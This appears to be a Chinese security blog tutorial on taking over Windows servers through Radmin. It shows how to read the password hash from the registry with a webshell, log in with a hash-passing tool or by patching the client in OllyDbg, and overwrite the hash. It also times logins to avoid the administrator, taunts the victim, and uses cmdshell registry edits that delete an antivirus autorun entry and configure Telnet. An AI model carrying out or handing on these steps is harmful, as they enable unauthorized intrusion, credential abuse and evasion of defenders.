还撑不起你的野心时

那你就应该静下心来学习

---

目录

Radmin 提权

0x01 介绍

0x02 利用方式

常见虚拟主机常见路径

第一种方式：手工查询注册表爆hash值

第二种方式：通过大马爆hash值

拓展知识

0x03 反汇编破解Radmin密码实例

0x04 利用各种shell获取注册表的方法

0x05 拓展知识

radmin2.1提权

---

Radmin 提权

0x01 介绍

Radmin是一款屡获殊荣的远程控制软件（服务器管理 ），它将远程控制、外包服务组件、以及网络监控结合到一个系统里，还是文件传输速度都很快、很方便，这样也形成了很多服务器都装了Radmin这样的远程控制器，并且提供目前为止最快速、强健而安全的工具包。

Radmin是平时在Windows下用的比较多的一个远程管理工具。其具有支持多个连接和IP 过滤(即允许特定的IP控制远程机器)、个性化的档互传、远程关机、支持高分辨率模式、基于Windows NT的安全支持及密码保护以及提供日志文件支持等特性。不过老版本的Radmin Server2.X、Radmin Server3.0都存在一个“致命”漏洞 —— Radmin hash提权漏洞。

注：

该漏洞的利用是需要有一定的前提条件的（就是双方都必须要安有Radmin(客户端、服务端)）。要获取读取系统注册表的权限（并不需要有写权限）。当然，获得此权限的方法很多。基本上取得webshell、cmdshell后都能获取该权限。

radmin的密码都是32位md5加密后，存放在注册表里的。

推荐红盟社区的精品文章：Radmin 远控的深度研究—无毒远控终极提权

http://www.cnhonkerarmy.com/thread-132999-1-6.html

---

0x02 利用方式

这里 CE介绍两种利用方式，一种是手工查询注册表，一个个的利用计算器计算出来（十六进制），另一种就是通过大马里集成的Radmin 提权，直接爆出hash值

radmin提权：（默认端口4899）直接使用大马中的Radmin提权，可以直接读取Radmin的密码（密文），同样使用工具radmin_hash.exe直接新建连接，然后右键完全控制，将32位的hash密文直接输入即可（注：在大马里面获取的密文为大写，需要先进行小写转换）

Radmin提权思路：
1. 在webshll中检查出有安装Radmin程序；
2. 在读取Radmin注册表键值，然后把读取的十进制转换成16进制；
3. 直接用radmi-hash工具连接，把读取的十六进制填入进去；
4. 最后可以用radmin客户端连接就行了；

常见虚拟主机常见路径

1. D:\virtualhost\web580651\www\ 新网虚拟主机
2. F:\usr\fw04408\xpinfo\ 万网虚拟主机
3. D:\hosting\wwwroot\ Prim@Hosting虚拟主机
4. e:\wwwroot\longzhihu\wwwroot\ 华众虚拟主机
5. d:\freehost\zhoudeyang\web\ 星外虚拟主机主机
6. D:\vhostroot\LocalUser\gdrt\ 星外分支
7. f:\host\wz8088\web\ 星外分支
8. D:\vhostroot\localuser\ vhostroot

第一种方式：手工查询注册表爆hash值

从注册表的下列路径取得所要的hash值和端口值：

1. //默认密码注册表位置
2. HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParametersParameter
3. //默认端口注册表位置
4. HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParametersPort

parameters下的配置大致如下所示：

1. [HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters]
2. "NTAuthEnabled"=hex:00,00,00,00
3. "Parameter"=hex:b5,bb,fc,50,93,ba,35,b0,7d,a6,57,f7,d6,f1,9a,a0
4. "Port"=hex:11,27,00,00
5. "Timeout"=hex:0a,00,00,00
6. "EnableLogFile"=hex:01,00,00,00
7. "LogFilePath"="c:logfile.txt"
8. "FilterIp"=hex:00,00,00,00
9. "DisableTrayIcon"=hex:00,00,00,00
10. "AutoAllow"=hex:00,00,00,00
11. "AskUser"=hex:00,00,00,00
12. "EnableEventLog"=hex:00,00,00,00

如何知道受害者主机的端口是多少？我们在自己电脑上装上一个同版本的radmin，注册表中找到相关的位置。将其中的端口的hex值改成和查到的一样，再查看自己的设置里的端口变成了多少。上例中所取的值11，27，00，00 即是10001端口。而通radmin_hash修改版输入32位hash值就会连接上主机。

第二种方式：通过大马爆hash值

大致步骤分为：

1. 1. 端口扫描 4899 端口
2. 2. 上传大马读取Radmin的加密密文
3. 3. 下载Radmin工具连接（可以使用RadminHash工具调试连接）

点击大马中的radmin提权功能，从下图中看到端口为4899， 密码为密文格式的，尝试破解一下密码

我们输入默认大写的hash值，弹窗报错密码输入有误，那我们就需要把hash值进行转换为小写

我随便从网上找的一个大小写转换工具

转换大小写地址链接：https://www.iamwawa.cn/daxiaoxie.html

转换成功后，我们试着用Radmin_Hash工具连接一下，看看能不能连接成功

读出HASH值后用Radmin_Hash工具或od调试连接，工具下载地址如下：

链接：https://pan.baidu.com/s/1REhmow_Ryf1qF79ap1pp3w 
提取码：umqh

成功Radmin_Hash工具使用连接上受害者主机

当然，我们进行远程连接时，需要与管理员岔开时间段登录，要不然被发现那就凉凉了，切记，一定要再管理员下线后操作，所以我们一定要在晚上进行此操作，不要在白天进行。那我们怎么看管理员在没在线呢？

查看管理员是否在线命令如下：

query user

注：此命令可以看到此刻管理员的登录状态及时间

或戏弄管理员，皮一下。例如：
Msg administrator+你要发送的内容

Msg administrator 沙雕，你已变成我的肉鸡了！哈哈哈

---

拓展知识

0x03 反汇编破解Radmin密码实例

前提条件: 
一个webshell 最好有读取注册表的权限 
如果不能读取radmin注册表至少wscript.shell组件没删 这样我们可以调用cmd 
导出radmin的表值 
radmin的注册表值，也就是经过加密的MD5 hash值 是32位哦 
比如 radmin的注册表里，密码是这样存放的 
port 端口 
Parameter REG_BINARY 1f 19 8c dd ** ** ** ** ** **有16组 每组两个 合起来 就是32位了

工具 : 
radmin 控制端 
OllyDBG反汇编

首先 先用OllyDBG打开 radmin控制端(客户端) 
然后执行 ctrl f 搜索 JMP EAX 
然后按一下F4 再按F8 
然后再 右键-查找-所有常量 
输入 10325476 (很好记的 反过来就是76543210) 
在弹出的窗口中 选择第一行 F2下断 
然后F9 运行 
这时 你就用radmin连接 你要入侵的服务器 
这时 会弹出 叫你输入密码的提示框 不用管 随便输入密码 
等你输入完 后 OD也就激活了

这时 你要先运行下Ctrl F9 再往上几行 选中红色的那块 就是刚才下断的地方 
再次 按F2 一下 取消断点 然后再按 F8 这时 鼠标往下走 找到 
ADD ES,18 这里 按一下F4 
这时 你在左下角的 hex 那里 随便找个地方点一下 
然后 运行Ctrl G 在弹出的栏里 输入 [esp] 注意带大括号的 
然后 就注意把第一行 复制替换成 刚才我们得到的radmin密码的hash值 
后按F9 运行看看 哈哈 是不是 搞定拉 
这个方法 局限性很小 一般 的webshell都能 查看radmin的注册表 
或者利用wscript.shell 导出radmin的密码 就可以进行欺骗了

比起，你暴力破解不知道要省多少倍时间......

0x04 利用各种shell获取注册表的方法

下面以一个cmdshell为例，解读操作注册表键值的方法。

1、读取注册表（利用regedit导出，利用type查询）

1. C:>regedit /e 1.reg "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"
2. C:>type 1.reg | find "PortNumber"
3. "PortNumber"=dword:00000d3d
4. C:>del 1.reg

2、修改/删除注册表项

1. echo Windows Registry Editor Version 5.00 >1.reg
2. echo. >>1.reg
3. echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftTelnetServer1.0] >>1.reg
4. echo "TelnetPort"=dword:00000913 >>1.reg
5. echo "NTLM"=dword:00000001 >>1.reg
6. echo. >>1.reg
7. regedit /s 1.reg

上面是利用echo写入一个reg文件，并通过regedit命令导入。而删除操作与上面类似：

1. 要删除一个项，在名字前面加减号，比如：
2. [-HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesServ-U]
3. 要删除一个值，在等号后面用减号，比如：
4. [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
5. "KAVRun"=-

3、inf文件操作

如果regedit命令不允许我们直接操作，我们还可以绕道通过inf文件导入注册表。先建立一个reg.inf文件，内容如下：

1. [Version]
2. Signature="$WINDOWS NT$"
3. [DefaultInstall]
4. AddReg=My_AddReg_Name
5. DelReg=My_DelReg_Name
6. [My_AddReg_Name]
7. HKLM,SOFTWAREMicrosoftTelnetServer1.0,TelnetPort,0x00010001,2323
8. HKLM,SOFTWAREMicrosoftTelnetServer1.0,NTLM,0x00010001,1
9. [My_DelReg_Name]
10. HKLM,SYSTEMCurrentControlSetServicesServ-U
11. HKLM,SOFTWAREMicrosoftWindowsCurrentVersionRun,KAVRun

然后运行如下命令（假设刚才的inf文件的路径是c:pathreg.inf），即可完成和上面reg文件一样的功能：

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:pathreg.inf 

至于inf文件的内容每项的意思，可以参看DDK帮助手册。

0x05 拓展知识

radmin2.1提权

RADMIN的注册表项位于HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\ Parameter（在这个键值保存着密码）

在本机安装radmin，，把上面的密码键值导出，上传到webshell的可写目录中

cmd下执行下列2行的命令：

REGEDIT -E C:\123.REG HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters （导出密码文件到c盘，c盘要有可写目录）

此步骤可以省略，直接导入本机的密码，实验通过。

REGEDIT -s C:\456.REG HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters （导入密码到注册表）

然后本机连接服务器ip，密码是本地radmin密码

参考连接：

http://www.361way.com/radmin-hash-loophole/2146.html

https://www.jb51.net/hack/5082.html

https://www.cnblogs.com/xishaonian/p/6031556.html

---

我不需要自由，只想背着她的梦

一步步向前走，她给的永远不重

---

提权学习：第三方软件提权（Radmin 提权） 4899相关推荐

1. 提权学习：Linux普通用户提权为root

   当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 Linux普通用户提权为root 接下来直接看实例 Linux普通用户提权为root 我记得我以前用Linux的时候,忘记root密码是常 ...

2. 提权学习之旅——Linux操作系统提权

   首发于先知社区 https://xz.aliyun.com/t/8139 前言: 上次学习了Windows操作系统的提权以及相关工具的利用,这次就来学习一下Linux操作系统的提权 Linux提权基础 ...

3. 提权学习之旅——利用Metasploit提权

   Metasploit基础 0x00:简介 Metasploit是一个漏洞利用框架,简称msf.是一个免费的.可下载的框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击,,而且本身附带数百个已 ...

4. 提权学习：第三方软件提权（Server-u 提权）43958

   当你的才华 还撑不起你的野心时 那你就应该静下心来学习 第三方软件提权 Server-u 提权 Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2 ...

5. 提权学习：第三方软件提权（破解hash 提权、MFS 破解hash 提权、GetPass 破解hash提权、QuarksPwDump 破解hash提权）

   当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 破解hash 值提权 0x01 Pwdunp7 破解hash 0x02 GetPass 破解hash 0x03 hash传递入侵 MSF加 ...

6. Day1——提权学习之提权基础

   0x00 提权技术分类 大概分为三种: 1.系统溢出漏洞提权 2.数据库提权 3.第三方软件提权 0x01 通常脚本所处的权限 1.asp / php 匿名权限(网络服务权限) 2.aspx user ...

7. 提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权

   一.初识提权 很多时候我们入侵一个网站的时候,想要的是得到这个服务器的权限,也就是admin权限,但是一般默认得到的是普通用的地权限,权限很小,所以就要通过其他手段,提升自己的权限. 提权是将服务器的 ...

8. （59.2）【Windows提权】权限等级、PSTools提权、at命令提权、sc命令提权

   目录 一.权限分配 1.1.Windows: 1.2.Linux 二.PSTools提权 2.1.简介: 2.2.微软官网: 2.3.PsExec提权: 三.at命令提权 3.1.原理: 3.2.适用 ...

9. 深度学习 vs. 大数据：神经网络权值的版权属于谁？

    深度学习 vs. 大数据:神经网络权值的版权属于谁? width="22" height="16" src="http://hits.sinaj ...

最新文章

1. linux oracle 用户创建,LINUX下Oracle数据库用户创建方法详解
2. express运行原理
3. python爬取csdn排名积分等信息
4. JNI编程基础（二）——Android Studio NDK开发
5. 使用object detection训练并识别自己的模型
6. C语言再学习 -- 再论内存管理
7. PHP中类明明存在 但class_exists 确检测不到的坑: 使用完整命名空间
8. html浏览器边框颜色,CSS设置字体和边框颜色时Chrome和其他主流浏览器差别的问题_html/css_WEB-ITnose...
9. Genymotion下载及安装(安卓虚拟机)
10. 红米手机使用应用沙盒一键修改cpu信息
11. Markdown编辑器：好看的字体颜色和各种表情符号
12. linux系统底层,干货｜七点，用计算机底层知识教你安装Linux系统！
13. 【Python数据分析 ：Task4】
14. C语言的语句与程序的基本结构
15. 东半球空间环境地基综合监测子午链——子午工程
16. python与建筑地铁结合_Python基础（3）——北京市地铁买票问题（思维练习题）...
17. matlab粒子群加约束条件_粒子群算法（PSO）MATLAB实现
18. 优秀的相关网站留存【实时更新】
19. Backgrounds for Mac(mac桌面动态壁纸)
20. 水池水位无线自动控制系统

热门文章

1. YOLO—神经网络原理
2. 19美亚个人赛复盘2（手机取证）
3. JixiPix Hand Tint Pro for Mac(图片处理软件)
4. 网站诊断分析-网站诊断分析软件-网站SEO诊断分析软件
5. 二氧化硅改性活性炭|SiO2改性的V2O5-MoO3/TiO2催化剂|SiO2改性MCM-22分子筛上联苯|纳米SiO2改性环氧涂层海洋腐蚀规律
6. tp5.1 集成支付宝支付方法(二)
7. 网站推行：外链建设需求留意什么？
8. com.github.abel533.mapper.MapperProvider插件使用遇到的问题
9. html页面打包为小程序
10. Windows驱动_WSK驱动之四WSK例程